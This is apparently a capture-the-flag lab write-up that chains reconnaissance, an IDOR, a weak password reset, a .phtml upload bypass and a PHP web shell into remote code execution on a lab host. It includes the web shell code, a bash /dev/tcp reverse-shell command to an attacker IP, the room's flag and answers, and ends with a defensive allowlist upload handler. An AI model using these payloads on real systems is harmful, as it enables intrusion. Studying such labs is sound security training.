Guided Pentest Web

Penetration Testing Foundations 1/5

Task 1 Introduction

No answer needed

Task 2 Reconnaissance and Enumeration

>tgt=10.67.138.108
>nmap -sV -sC -p- $tgt
>curl -I $tgt
>gobuster dir -u $tgt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

We see 4 ports open: 22, 80, 3306, and 8080. The response headers confirm that Apache 2.4.58 and PHP are in use.

There are some interesting site directories in use:

  • /admin
  • /api
  • /reset.php
  • /uploads
  • /profile.php
  • /dashboard.php

Browse to http://10.67.138.108/api/ to view endpoints:

  • user
  • jobs
  • applications

What version of the Apache server is running? 2.4.58

What database service is running on the target? MySQL

What is the path to the password reset page? /reset.php

Task 3 IDOR

Navigate to the profile page. The URL should look like http://10.67.138.108/profile.php?id=6.

Change the id to see if the site is susceptible to an IDOR attack.

curl -s "http://$tgt/api/user?id=1"

What is the name of the administrator user? Sarah Mitchell

What role does James Crawford hold? hiring_manager

Task 4 Weak Password Reset

With the administrator email s.mitchell@recruitx.thm, we should use /reset.php to reset the password.

How many digits long is the reset token? 6

After resetting the password for s.mitchell@recruitx.thm and logging in, what role is displayed for that account in the dashboard? Administrator

Task 5 Admin Panel Access

Now we can access the admin panel at /admin/upload.php.

We can test the upload validation by changing the file extension to a lesser-known PHP extension that the server still executes.

echo '<?php echo "PHP is executing"; ?>' > test.phtml

What is the name of the PHP file responsible for handling file upload in the RecruitX web app? upload.php

What HTML attribute on the file input is used to restrict selectable file extensions on the client side? accept

Which alternative PHP extension bypassed the upload filter? .phtml

Task 6 Remote Code Execution

Create shell.phtml and upload it to the admin panel.

<?php
if(isset($_GET['cmd'])) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>

Verify it’s working with curl "http://10.67.138.108/uploads/documents/shell.phtml?cmd=id"

Next, create a listener on the attacking system: nc -lvnp 4444

Run the attack: curl "http://10.67.138.108/uploads/documents/shell.phtml?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.67.107.60/4444+0>%261'"

Switch to the netcat tab to answer the questions.

What user is the web shell running as? www-data

What is the hostname of the target server? recruitx-prod

What is the flag? THM{ch41n3d_vulns_4r3_d3v4st4t1ng}

Task 7 The Attack Chain

How many distinct vulnerabilities were chained together in this engagement? 4

What approach should be used instead of a blocklist when validating file uploads? allowlist
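The allowlist approach, as an added example of what a hardened upload handler looks like (this is not the RecruitX upload.php from the room); it assumes a form field named document and a storage directory passed in by the caller:

```php
<?php
// Server-side allowlist for an upload handler. The HTML "accept" attribute only
// filters the file picker in the browser and is bypassed by any direct request,
// so every check here runs on the server against the bytes actually received.
// Assumed field name: $_FILES['document']; assumed storage path: $destDir.
const ALLOWED_TYPES = [
    'pdf'  => ['application/pdf'],
    'docx' => ['application/vnd.openxmlformats-officedocument.wordprocessingml.document'],
];

function validate_upload(array $file, string $destDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Extension after the LAST dot: "shell.phtml" -> "phtml", "cv.pdf" -> "pdf".
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    // Allowlist: anything not explicitly listed is rejected, so .phtml, .phar,
    // .php5 and every other alias never need to be enumerated in a blocklist.
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return null;
    }
    // Detect the real content type from the file bytes; $file['type'] is
    // supplied by the client and cannot be trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_TYPES[$ext], true)) {
        return null;
    }
    // Discard the user-supplied name entirely: random name + allowlisted extension.
    $safeName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($destDir, '/') . '/' . $safeName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return $safeName;
}

// Usage (assumed field name and path): a rejected file returns null.
$stored = validate_upload($_FILES['document'] ?? [], '/var/recruitx/private_uploads');
echo $stored === null ? 'Upload rejected' : 'Stored as ' . $stored;
```

As defence in depth, keep $destDir outside the web root or configure Apache to serve that directory without a PHP handler, so even a file that slips past validation cannot be executed as it was in this room.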

Task 8 Conclusion

No answer needed

This post is licensed under CC BY 4.0 by the author.